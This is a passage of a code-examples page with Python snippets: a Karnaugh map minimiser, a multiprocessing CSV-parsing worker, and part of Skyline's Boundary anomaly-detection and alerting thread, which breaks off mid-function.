            for index, a in enumerate(blocks):
                self.completion = int((1.0*(index+1)/len(blocks)*1.0*1/max+(sizeloop-1.0)/max)*100)
                completion.value = self.completion
                Join(a,sizeloop)
##                processblocks = list(blocks)
##                process = JoinTask(self, processblocks , a, i)
##                ProcessList.append(process)
##                #process.run()
##                process.start()
##                while len(ProcessList) >= self.MaxProcess:
##                    for process in ProcessList:
##                        process.join(1)
##                        if not process.is_alive():
##                            ProcessList.remove(process)
##            while ProcessList:
##                for process in ProcessList:
##                    process.join(10)
##                    if not process.is_alive():
##                        ProcessList.remove(process)
##                    else:
##                        print 'wait for process ...' % process.name
            # Flag block include in other block
            a_blocks = [block for block in self.blocks if (block.flag==False and block.numberOfItems < pow(2.0, sizeloop)) ]
            for a_block in a_blocks:
                b_blocks = [block for block in self.blocks if (block!=a_block and block.numberOfItems > a_block.numberOfItems) ]
                for b_block in b_blocks:
                    flag_block = True
                    for index in range(len(b_block.values)):
                        if a_block.values[index] != b_block.values[index] and b_block.values[index] != 2:
                            flag_block = False
                            break
                    if flag_block:
                        self.blocks.remove(a_block)
                        break

            #/* Deletes nodes that are cointained in larger nodes */
            blocks = [block for block in self.blocks if (block.flag==True) ]
            for a in blocks:
                self.blocks.remove(a)

        # Delete nodes that are Don't care only ones
        blocks = self.blocks
        for block in blocks:
            DCareblock = True
            for i in range(0,self.height):
                for j in range(0,self.width):
                    if(self.IsAtCell(j, i, block.values)):
                        if self.kmapDCare[(j, i)]!=1:
                            DCareblock = False
            if DCareblock:
                self.blocks.remove(block)

        #/* Deletes unneeded nodes. Draws a temp map with all nodes but one
        #and if that map is same as the main map, node that wasn't drawn can be deleted */

        temp = {}
        blocks = self.blocks
        for a in blocks:
            for i in range(0,self.height):
                for j in range(0,self.width):
                    temp[(j, i)]=0

            for b in blocks:
                if(a!=b):
                    for i in range(0,self.height):
                        for j in range(0,self.width):
                            if(self.IsAtCell(j, i, b.values)):
                                temp[(j, i)]=1
            del_var=1
            for i in range(0,self.height):
                for j in range(0,self.width):
                    if(temp[(j, i)]!=self.kmap[(j, i)]) and self.kmapDCare[(j, i)] != 1 :
                        del_var=0
                        break
                if(not del_var):
                    break
            if(del_var):
                self.blocks.remove(a )

    def IsAtCell(self,  x,  y,  a):

        b=self.GetMapBoolValue(x, y )
        for i in range(0, len(a) ):
            if( (a[i]!=b[i]) & (a[i]!=2) ): return 0
        return 1


    def GetMapBoolValue(self, x, y):

        b = []
        i=self.GetMapValue(x, y )
        while(i>0):

            b.insert(0, i%2 )
            i=i/2

        for j in range(len(b), self.numberOfVariables):
            b.insert(0, 0 )
        return b


    def IsJoinable(self, a, b):
        """ Checks if 2 karnaugh nodes with values a and b are joinable (only differ in one bit),
        and if they are returns (place where they differ + 1), otherwise returns 0 """

        c=0
        for i in range(0,len(a)):

            if(a[i]!=b[i]):

                c += 1
                x=i
        if(c==1):
            return x+1
        else:
            return 0


    def GrayEncode(self, g):

        return int(g) ^ (int(g) >> 1 )



    def Set(self, x, y, value):

        self.kmap[(x, y)]=value
        if(value==2) :

            self.kmapDCare[(x, y)]=1
            self.numberOfDCares += 1

        else:
            self.kmapDCare[(x, y)]=0


    def Get(self, x, y):

        if(not self.kmapDCare[(x,y)]):
            return self.kmap[(x,y)]
        else:
            return 2


    def GetMapValue(self, x, y):

        return self.kmapValues[(x,y)]


    def GetWidth(self):

        return self.width


    def GetHeight(self):

        return self.height


    def GetSolutions(self):

        return self.blocks


    def GetNumberOfVars(slef):

        return self.numberOfVariables
Ejemplo n.º 47
0
class Worker(object):

    def __init__(self, fname, output_file):
        self.fname = fname
        self.split_files = None
        '''
        self.db_instance = Utility.tinydb_instance()
        '''
        self.undefined_list = Manager().list()
        self.defined_list = Manager().list()
        self.lines_to_be = 0
        self.output = {}
        self.opfile = output_file

    def data_process(self):
        """
        This method is to process the data. It will calculate the line count in file
        and split file based on line count. Now files are split to the number based on
        number of cores in machine.
        returns :Nothing
        """
        logging.info('Processing the data and split files')
        lines = Utility.file_len(self.fname)
        self.lines_to_be, self.split_files = Utility.split_files(self.fname, lines,
                                                                 cpu_count().real)

    def clean_json(self, line_no, row):
        """
        This method is for initial cleaning to reduce overhead from parser.
         Length of the Each line should be either 4 or 5 comma seperated
        :param line_no:  Line number from the file
        :param row: the document to process
        :return: Boolean
        """
        if len(row) not in [4, 5]:
            return False
        return True

    def parse_json(self, fname):
        """
        This is the core function. It will call ParseDoc object and parse each document
        The output is written to a shared memory list.
        :param fname:
        :return: Nothing
        """
        dp = DocProcess(fname, self.lines_to_be)
        dp.read_csv()
        parser_doc = ParseDoc()
        for line_no, row in dp.next():
            row_list = row.split(',')
            if self.clean_json(line_no, row_list):
                value = parser_doc.parse_machine(row_list)
                if value:
                    self.defined_list.append(value)
                else:
                    self.undefined_list.append(line_no)
            else:
                self.undefined_list.append(line_no)

    def mapper(self):
        workers = []
        for s_file in self.split_files:
            worker_process = Process(target=self.parse_json, args=(s_file, ))
            workers.append(worker_process)
            worker_process.start()

        [worker.join() for worker in workers]

    def reducer(self):
        self.output["entries"] = list(self.defined_list)
        self.output["errors"] = list(self.undefined_list)

        self.output["errors"].sort()
        new_list = sorted(self.output["entries"], key=itemgetter('lastname'))
        self.output["entries"] = new_list

        with open(self.opfile, 'w') as f:
            pprint.pprint(self.output, f, indent=2)

    def run(self):
        self.mapper()
        self.reducer()
Ejemplo n.º 48
0
class Boundary(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Boundary
        """
        super(Boundary, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.boundary_metrics = Manager().list()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def unique_noHash(self, seq):
        seen = set()
        return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

    # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True
    # for dumping the metric timeseries data into for debugging purposes
    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        except OSError as exc:
            # Python >2.5
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def spin_process(self, i, boundary_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Determine assigned metrics
        bp = settings.BOUNDARY_PROCESSES
        bm_range = len(boundary_metrics)
        keys_per_processor = int(ceil(float(bm_range) / float(bp)))
        if i == settings.BOUNDARY_PROCESSES:
            assigned_max = len(boundary_metrics)
        else:
            # This is a skyine bug, the original skyline code uses 1 as the
            # beginning position of the index, python indices begin with 0
            # assigned_max = len(boundary_metrics)
            # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014
            # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment
            assigned_max = min(len(boundary_metrics), i * keys_per_processor)
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys]
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing assigned_metrics_and_algos')
            for assigned_metric_and_algo in assigned_metrics_and_algos:
                logger.info('debug :: assigned_metric_and_algo - %s' % str(assigned_metric_and_algo))

        # Compile assigned metrics
        assigned_metrics = []
        for i in assigned_metrics_and_algos:
            assigned_metrics.append(i[0])

        # unique unhashed things
        def unique_noHash(seq):
            seen = set()
            return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

        unique_assigned_metrics = unique_noHash(assigned_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: unique_assigned_metrics - %s' % str(unique_assigned_metrics))
            logger.info('debug :: printing unique_assigned_metrics:')
            for unique_assigned_metric in unique_assigned_metrics:
                logger.info('debug :: unique_assigned_metric - %s' % str(unique_assigned_metric))

        # Check if this process is unnecessary
        if len(unique_assigned_metrics) == 0:
            return

        # Multi get series
        try:
            raw_assigned = self.redis_conn.mget(unique_assigned_metrics)
        except:
            logger.error('error :: failed to mget assigned_metrics from redis')
            return

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Reset boundary_algortims
        all_boundary_algorithms = []
        for metric in BOUNDARY_METRICS:
            all_boundary_algorithms.append(metric[1])

        # The unique algorithms that are being used
        boundary_algorithms = unique_noHash(all_boundary_algorithms)
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: boundary_algorithms - %s' % str(boundary_algorithms))

        discover_run_metrics = []

        # Distill metrics into a run list
        for i, metric_name, in enumerate(unique_assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacking timeseries for %s - %s' % (metric_name, str(i)))
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
            except Exception as e:
                exceptions['Other'] += 1
                logger.error('error :: redis data error: ' + traceback.format_exc())
                logger.error('error :: %e' % e)

            base_name = metric_name.replace(FULL_NAMESPACE, '', 1)

            # Determine the metrics BOUNDARY_METRICS metric tuple settings
            for metrick in BOUNDARY_METRICS:
                CHECK_MATCH_PATTERN = metrick[0]
                check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                pattern_match = check_match_pattern.match(base_name)
                metric_pattern_matched = False
                if pattern_match:
                    metric_pattern_matched = True
                    algo_pattern_matched = False
                    for algo in boundary_algorithms:
                        for metric in BOUNDARY_METRICS:
                            CHECK_MATCH_PATTERN = metric[0]
                            check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                            pattern_match = check_match_pattern.match(base_name)
                            if pattern_match:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: metric and algo pattern MATCHED - " + metric[0] + " | " + base_name + " | " + str(metric[1]))
                                metric_expiration_time = False
                                metric_min_average = False
                                metric_min_average_seconds = False
                                metric_trigger = False
                                algorithm = False
                                algo_pattern_matched = True
                                algorithm = metric[1]
                                try:
                                    if metric[2]:
                                        metric_expiration_time = metric[2]
                                except:
                                    metric_expiration_time = False
                                try:
                                    if metric[3]:
                                        metric_min_average = metric[3]
                                except:
                                    metric_min_average = False
                                try:
                                    if metric[4]:
                                        metric_min_average_seconds = metric[4]
                                except:
                                    metric_min_average_seconds = 1200
                                try:
                                    if metric[5]:
                                        metric_trigger = metric[5]
                                except:
                                    metric_trigger = False
                                try:
                                    if metric[6]:
                                        alert_threshold = metric[6]
                                except:
                                    alert_threshold = False
                                try:
                                    if metric[7]:
                                        metric_alerters = metric[7]
                                except:
                                    metric_alerters = False
                            if metric_pattern_matched and algo_pattern_matched:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: added metric - %s, %s, %s, %s, %s, %s, %s, %s, %s' % (str(i), metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, algorithm))
                                discover_run_metrics.append([i, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm])

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing discover_run_metrics')
            for discover_run_metric in discover_run_metrics:
                logger.info('debug :: discover_run_metrics - %s' % str(discover_run_metric))
            logger.info('debug :: build unique boundary metrics to analyze')

        # Determine the unique set of metrics to run
        run_metrics = unique_noHash(discover_run_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing run_metrics')
            for run_metric in run_metrics:
                logger.info('debug :: run_metrics - %s' % str(run_metric))

        # Distill timeseries strings and submit to run_selected_algorithm
        for metric_and_algo in run_metrics:
            self.check_if_parent_is_alive()

            try:
                raw_assigned_id = metric_and_algo[0]
                metric_name = metric_and_algo[1]
                base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                metric_expiration_time = metric_and_algo[2]
                metric_min_average = metric_and_algo[3]
                metric_min_average_seconds = metric_and_algo[4]
                metric_trigger = metric_and_algo[5]
                alert_threshold = metric_and_algo[6]
                metric_alerters = metric_and_algo[7]
                algorithm = metric_and_algo[8]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacking timeseries for %s - %s' % (metric_name, str(raw_assigned_id)))

                raw_series = raw_assigned[metric_and_algo[0]]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacked OK - %s - %s' % (metric_name, str(raw_assigned_id)))

                autoaggregate = False
                autoaggregate_value = 0

                # Determine if the namespace is to be aggregated
                if BOUNDARY_AUTOAGGRERATION:
                    for autoaggregate_metric in BOUNDARY_AUTOAGGRERATION_METRICS:
                        autoaggregate = False
                        autoaggregate_value = 0
                        CHECK_MATCH_PATTERN = autoaggregate_metric[0]
                        base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            autoaggregate = True
                            autoaggregate_value = autoaggregate_metric[1]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: BOUNDARY_AUTOAGGRERATION passed - %s - %s' % (metric_name, str(autoaggregate)))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info(
                        'debug :: analysing - %s, %s, %s, %s, %s, %s, %s, %s, %s, %s' % (
                            metric_name, str(metric_expiration_time),
                            str(metric_min_average),
                            str(metric_min_average_seconds),
                            str(metric_trigger), str(alert_threshold),
                            metric_alerters, autoaggregate,
                            autoaggregate_value, algorithm)
                    )
                    # Dump the the timeseries data to a file
                    timeseries_dump_dir = "/tmp/skyline/boundary/" + algorithm
                    self.mkdir_p(timeseries_dump_dir)
                    timeseries_dump_file = timeseries_dump_dir + "/" + metric_name + ".json"
                    with open(timeseries_dump_file, 'w+') as f:
                        f.write(str(timeseries))
                        f.close()

                # Check if a metric has its own unique BOUNDARY_METRICS alert
                # tuple, this allows us to paint an entire metric namespace with
                # the same brush AND paint a unique metric or namespace with a
                # different brush or scapel
                has_unique_tuple = False
                run_tupple = False
                boundary_metric_tuple = (base_name, algorithm, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters)
                wildcard_namespace = True
                for metric_tuple in BOUNDARY_METRICS:
                    if not has_unique_tuple:
                        CHECK_MATCH_PATTERN = metric_tuple[0]
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            if metric_tuple[0] == base_name:
                                wildcard_namespace = False
                            if not has_unique_tuple:
                                if boundary_metric_tuple == metric_tuple:
                                    has_unique_tuple = True
                                    run_tupple = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('unique_tuple:')
                                        logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                                        logger.info('metric_tuple: %s' % str(metric_tuple))

                if not has_unique_tuple:
                    if wildcard_namespace:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace:')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                        run_tupple = True
                    else:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace: BUT WOULD NOT RUN')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('WOULD RUN run_selected_algorithm = %s' % run_tupple)

                if run_tupple:
                    # Submit the timeseries and settings to run_selected_algorithm
                    anomalous, ensemble, datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm = run_selected_algorithm(
                        timeseries, metric_name,
                        metric_expiration_time,
                        metric_min_average,
                        metric_min_average_seconds,
                        metric_trigger,
                        alert_threshold,
                        metric_alerters,
                        autoaggregate,
                        autoaggregate_value,
                        algorithm
                    )
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug :: analysed - %s' % (metric_name))
                else:
                    anomalous = False
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug :: more unique metric tuple not analysed - %s' % (metric_name))

                # If it's anomalous, add it to list
                if anomalous:
                    anomalous_metric = [datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm]
                    self.anomalous_metrics.append(anomalous_metric)
                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

                    # If Crucible or Panorama are enabled determine details
                    determine_anomaly_details = False
                    if settings.ENABLE_CRUCIBLE and settings.BOUNDARY_CRUCIBLE_ENABLED:
                        determine_anomaly_details = True
                    if settings.PANORAMA_ENABLED:
                        determine_anomaly_details = True

                    if determine_anomaly_details:
                        metric_timestamp = str(int(timeseries[-1][0]))
                        from_timestamp = str(int(timeseries[1][0]))
                        timeseries_dir = base_name.replace('.', '/')

                    # If Panorama is enabled - create a Panorama check
                    if settings.PANORAMA_ENABLED:
                        # Note:
                        # The values are enclosed is single quoted intentionally
                        # as the imp.load_source used results in a shift in the
                        # decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                        added_at = str(int(time()))
                        source = 'graphite'
                        panaroma_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = [\'%s\']\n' \
                                                'triggered_algorithms = [\'%s\']\n' \
                                                'app = \'%s\'\n' \
                                                'source = \'%s\'\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(algorithm), str(algorithm),
                               skyline_app, source, this_host, added_at)

                        # Create an anomaly file with details about the anomaly
                        panaroma_anomaly_file = '%s/%s.%s.txt' % (
                            settings.PANORAMA_CHECK_PATH, added_at,
                            base_name)
                        try:
                            write_data_to_file(
                                skyline_app, panaroma_anomaly_file, 'w',
                                panaroma_anomaly_data)
                            logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                        except:
                            logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
                            logger.info(traceback.format_exc())

                    # If crucible is enabled - save timeseries and create a
                    # crucible check
                    if settings.ENABLE_CRUCIBLE and settings.BOUNDARY_CRUCIBLE_ENABLED:
                        crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                        if not os.path.exists(crucible_anomaly_dir):
                            if python_version == 2:
                                mode_arg = int('0755')
                            if python_version == 3:
                                mode_arg = mode=0o755
                            os.makedirs(crucible_anomaly_dir, mode_arg)

                        # Note:
                        # Due to only one algorithm triggering here the
                        # algorithm related arrays here are a different format
                        # to there output format in analyzer

                        # Note:
                        # The value is enclosed is single quoted intentionally
                        # as the imp.load_source used in crucible results in a
                        # shift in the decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0

                        crucible_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'anomaly_dir = \'%s\'\n' \
                                                'graphite_metric = True\n' \
                                                'run_crucible_tests = False\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(algorithm),
                               triggered_algorithms, crucible_anomaly_dir,
                               skyline_app, metric_timestamp)

                        # Create an anomaly file with details about the anomaly
                        crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                        with open(crucible_anomaly_file, 'w') as fh:
                            fh.write(crucible_anomaly_data)
                        if python_version == 2:
                            mode_arg = int('0644')
                        if python_version == 3:
                            mode_arg = '0o644'
                        os.chmod(crucible_anomaly_file, mode_arg)
                        logger.info('added crucible anomaly file :: %s/%s.txt' % (crucible_anomaly_dir, base_name))

                        # Create timeseries json file with the timeseries
                        json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
                        timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                        with open(json_file, 'w') as fh:
                            # timeseries
                            fh.write(timeseries_json)
                        if python_version == 2:
                            mode_arg = int('0644')
                        if python_version == 3:
                            mode_arg = '0o644'
                        os.chmod(json_file, mode_arg)
                        logger.info('added crucible timeseries file :: %s/%s.json' % (crucible_anomaly_dir, base_name))

                        # Create a crucible check file
                        crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                        with open(crucible_check_file, 'w') as fh:
                            fh.write(crucible_anomaly_data)
                        if python_version == 2:
                            mode_arg = int('0644')
                        if python_version == 3:
                            mode_arg = '0o644'
                        os.chmod(crucible_check_file, mode_arg)
                        logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info("exceptions['Other'] traceback follows:")
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process intializes.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('error :: skyline cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Reset boundary_metrics
            boundary_metrics = []

            # Build boundary metrics
            for metric_name in unique_metrics:
                for metric in BOUNDARY_METRICS:
                    CHECK_MATCH_PATTERN = metric[0]
                    check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    pattern_match = check_match_pattern.match(base_name)
                    if pattern_match:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: boundary metric - pattern MATCHED - ' + metric[0] + " | " + base_name)
                        boundary_metrics.append([metric_name, metric[1]])

            if ENABLE_BOUNDARY_DEBUG:
                logger.info('debug :: boundary metrics - ' + str(boundary_metrics))

            if len(boundary_metrics) == 0:
                logger.info('no Boundary metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.BOUNDARY_PROCESSES + 1):
                if i > len(boundary_metrics):
                    logger.info('WARNING: Skyline Boundary is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, boundary_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.BOUNDARY_ENABLE_ALERTS:
                for anomalous_metric in self.anomalous_metrics:
                    datapoint = str(anomalous_metric[0])
                    metric_name = anomalous_metric[1]
                    base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                    expiration_time = str(anomalous_metric[2])
                    metric_trigger = str(anomalous_metric[5])
                    alert_threshold = int(anomalous_metric[6])
                    metric_alerters = anomalous_metric[7]
                    algorithm = anomalous_metric[8]
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info("debug :: anomalous_metric - " + str(anomalous_metric))

                    # Determine how many times has the anomaly been seen if the
                    # ALERT_THRESHOLD is set to > 1 and create a cache key in
                    # redis to keep count so that alert_threshold can be honored
                    if alert_threshold == 0:
                        times_seen = 1
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug :: alert_threshold - " + str(alert_threshold))

                    if alert_threshold == 1:
                        times_seen = 1
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug :: alert_threshold - " + str(alert_threshold))

                    if alert_threshold > 1:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: alert_threshold - ' + str(alert_threshold))
                        anomaly_cache_key_count_set = False
                        anomaly_cache_key_expiration_time = (int(alert_threshold) + 1) * 60
                        anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name)
                        try:
                            anomaly_cache_key_count = self.redis_conn.get(anomaly_cache_key)
                            if not anomaly_cache_key_count:
                                try:
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('debug :: redis no anomaly_cache_key - ' + str(anomaly_cache_key))
                                    times_seen = 1
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('debug :: redis setex anomaly_cache_key - ' + str(anomaly_cache_key))
                                    self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                    logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                                except Exception as e:
                                    logger.error('error :: redis setex failed :: %s' % str(anomaly_cache_key))
                                    logger.error('error :: could not set key: %s' % e)
                            else:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: redis anomaly_cache_key retrieved OK - ' + str(anomaly_cache_key))
                                anomaly_cache_key_count_set = True
                        except:
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info('debug :: redis failed - anomaly_cache_key retrieval failed - ' + str(anomaly_cache_key))
                            anomaly_cache_key_count_set = False

                        if anomaly_cache_key_count_set:
                            unpacker = Unpacker(use_list=False)
                            unpacker.feed(anomaly_cache_key_count)
                            raw_times_seen = list(unpacker)
                            times_seen = int(raw_times_seen[0]) + 1
                            try:
                                self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                logger.info('error :: set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                            except:
                                times_seen = 1
                                logger.error('error :: set anomaly seen key failed :: %s seen %s' % (anomaly_cache_key, str(times_seen)))

                    # Alert the alerters if times_seen > alert_threshold
                    if times_seen >= alert_threshold:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: times_seen %s is greater than or equal to alert_threshold %s' % (str(times_seen), str(alert_threshold)))
                        for alerter in metric_alerters.split("|"):
                            # Determine alerter limits
                            send_alert = False
                            alerts_sent = 0
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info('debug :: checking alerter - %s' % alerter)
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: determining alerter_expiration_time for settings')
                                alerter_expiration_time_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_expiration_time'][alerter]
                                alerter_expiration_time = int(alerter_expiration_time_setting)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: determined alerter_expiration_time from settings - %s' % str(alerter_expiration_time))
                            except:
                                # Set an arbitrary expiry time if not set
                                alerter_expiration_time = 160
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: could not determine alerter_expiration_time from settings")
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: determining alerter_limit from settings")
                                alerter_limit_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_limit'][alerter]
                                alerter_limit = int(alerter_limit_setting)
                                alerter_limit_set = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: determined alerter_limit from settings - %s" % str(alerter_limit))
                            except:
                                alerter_limit_set = False
                                send_alert = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: could not determine alerter_limit from settings")

                            # If the alerter_limit is set determine how many
